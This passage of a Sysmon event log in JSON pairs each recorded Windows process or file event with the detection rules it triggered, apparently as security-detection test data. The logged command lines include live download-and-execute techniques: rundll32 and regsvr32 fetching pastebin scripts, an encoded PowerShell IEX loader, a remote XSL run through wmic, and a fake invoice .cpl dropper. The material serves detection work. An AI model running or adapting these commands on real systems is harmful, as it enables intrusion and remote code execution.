Spawn","Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /c copy /Y C:\\Windows\\system32\\rundll32.exe %%TEMP%%\\out.exe > nul && %%TEMP%%\\out.exe javascript:\"\\..\\mshtml RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://pastebin.com/raw/y2CjnRtH\",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im out.exe\",0,true);}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-ABD5-5D3A-0000-0020EB990F00","LogonId":"0xf99eb","ParentCommandLine":"\"C:\\Windows\\hh.exe\" C:\\Users\\IEUser\\Desktop\\Fax Record N104F.chm","ParentImage":"C:\\Windows\\hh.exe","ParentProcessGuid":"747F3D96-AE22-5D3A-0000-001096B24E00","ParentProcessId":1504,"ProcessGuid":"747F3D96-AE22-5D3A-0000-001004D84E00","ProcessId":5548,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-26 07:39:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4353,"Execution":{"#attributes":{"ProcessID":5924,"ThreadID":6056}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-26T07:39:14.935857Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" zipfldr.dll,RouteTheCall c:\\Windows\\System32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"python winpwnage.py -u execute -i 14 -p c:\\Windows\\System32\\calc.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-268F-5CD8-0000-0010F4A51700","ParentProcessId":1256,"ProcessGuid":"365ABB72-269E-5CD8-0000-001084F81A00","ProcessId":2728,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:58:54.772"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16443,"Execution":{"#attributes":{"ProcessID":2036,"ThreadID":296}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T13:58:54.897009Z"}},"Version":5}}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Calculator","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\System32\\pcalua.exe\" -a c:\\Windows\\system32\\calc.exe","ParentImage":"C:\\Windows\\System32\\pcalua.exe","ParentProcessGuid":"365ABB72-517E-5CD8-0000-001024D61700","ParentProcessId":2952,"ProcessGuid":"365ABB72-517E-5CD8-0000-00105FE01700","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 17:01:50.852"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16498,"Execution":{"#attributes":{"ProcessID":2012,"ThreadID":300}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T17:01:51.007950Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-63FC-5CD8-0000-0020EE3E0100","LogonId":"0x13eee","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-6693-5CD8-0000-0010AE4C0E00","ParentProcessId":3528,"ProcessGuid":"365ABB72-6759-5CD8-0000-0010E2D50F00","ProcessId":1420,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 18:35:05.140"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16792,"Execution":{"#attributes":{"ProcessID":1880,"ThreadID":2020}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T18:35:05.155949Z"}},"Version":5}}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-63FC-5CD8-0000-0020EE3E0100","LogonId":"0x13eee","ParentCommandLine":"regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"365ABB72-6759-5CD8-0000-0010E2D50F00","ParentProcessId":1420,"ProcessGuid":"365ABB72-6759-5CD8-0000-001085031000","ProcessId":1912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 18:35:05.765"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16793,"Execution":{"#attributes":{"ProcessID":1880,"ThreadID":2020}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-12T18:35:05.780949Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-F41E-5D53-0000-001067C80300","ParentProcessId":4824,"ProcessGuid":"747F3D96-FBCA-5D53-0000-0010B8664100","ProcessId":2476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 12:17:14.447"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10674,"Execution":{"#attributes":{"ProcessID":2004,"ThreadID":4480}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-14T12:17:14.614739Z"}},"Version":5}}}},{"detection":["FromBase64String Command Line","Encoded FromBase64String","Suspicious Script Execution From Temp Folder","Encoded IEX"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))\"\"\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-FBCA-5D53-0000-0010B8664100","ParentProcessId":2476,"ProcessGuid":"747F3D96-FBCA-5D53-0000-001036784100","ProcessId":2876,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 12:17:14.661"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10675,"Execution":{"#attributes":{"ProcessID":2004,"ThreadID":4480}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-14T12:17:14.893930Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-07-29 21:09:48.910","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-6056-5D3F-0000-0010C9EF4100","ProcessId":4600,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl","UtcTime":"2019-07-29 21:11:11.127"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4860,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:11:11.156704Z"}},"Version":2}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\System32\\control.exe\" \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\System32\\control.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010A7B65500","ParentProcessId":4996,"ProcessGuid":"747F3D96-60F5-5D3F-0000-0010D1CF5500","ProcessId":4356,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:17.445"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4863,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:11:17.587732Z"}},"Version":5}}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010D1CF5500","ParentProcessId":4356,"ProcessGuid":"747F3D96-60F5-5D3F-0000-0010A8D75500","ProcessId":4884,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:17.503"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4864,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:11:17.621241Z"}},"Version":5}}}},{"detection":["Suspicious Script Execution From Temp Folder"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\wscript.exe\" /e:JScript.Encode /nologo C:\\Users\\IEUser\\AppData\\Local\\Temp\\info.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE","Image":"C:\\Windows\\SysWOW64\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-6053-5D3F-0000-0020B5314100","LogonId":"0x4131b5","ParentCommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 \"C:\\Users\\IEUser\\Downloads\\Invoice@0582.cpl\",","ParentImage":"C:\\Windows\\SysWOW64\\rundll32.exe","ParentProcessGuid":"747F3D96-60F5-5D3F-0000-0010A8D75500","ParentProcessId":4884,"ProcessGuid":"747F3D96-60F7-5D3F-0000-00106F2F5600","ProcessId":6160,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:11:19.010"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4865,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:11:19.098105Z"}},"Version":5}}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"wmic process list /format:\"https://a.uguu.se/x50IGVBRfr55_test.xsl\"","Company":"Microsoft Corporation","CurrentDirectory":"c:\\","Description":"WMI Commandline Utility","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-CE84-5CE6-0000-001094130600","ParentProcessId":2940,"ProcessGuid":"365ABB72-CF01-5CE6-0000-00105DA50C00","ProcessId":3872,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 16:49:05.686"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":892,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-23T16:49:05.736570Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-23 16:49:07.731","Image":"C:\\Windows\\System32\\Wbem\\WMIC.exe","ProcessGuid":"365ABB72-CF01-5CE6-0000-00105DA50C00","ProcessId":3872,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\x50IGVBRfr55_test[1].xsl","UtcTime":"2019-05-23 16:49:07.731"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":894,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-23T16:49:07.731893Z"}},"Version":2}}}},{"detection":["WScript or CScript Dropper","Suspicious Script Execution From Temp Folder"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S97WTYG7\\updatevbs.vbs\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.8.7600.16385","Hashes":"SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-98E4-5D04-0000-0020A4350100","LogonId":"0x135a4","ParentCommandLine":"\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" C:\\Users\\IEUser\\Downloads\\updatevbs.html","ParentImage":"C:\\Program Files\\Internet Explorer\\iexplore.exe","ParentProcessGuid":"365ABB72-9C8E-5D04-0000-0010D0421600","ParentProcessId":540,"ProcessGuid":"365ABB72-9C9D-5D04-0000-001039CE1600","ProcessId":172,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-06-15 07:22:05.660"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":7681,"Execution":{"#attributes":{"ProcessID":2044,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-06-15T07:22:05.691759Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.236","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\~DF0187A90594A6AC9B.TMP","UtcTime":"2021-01-26 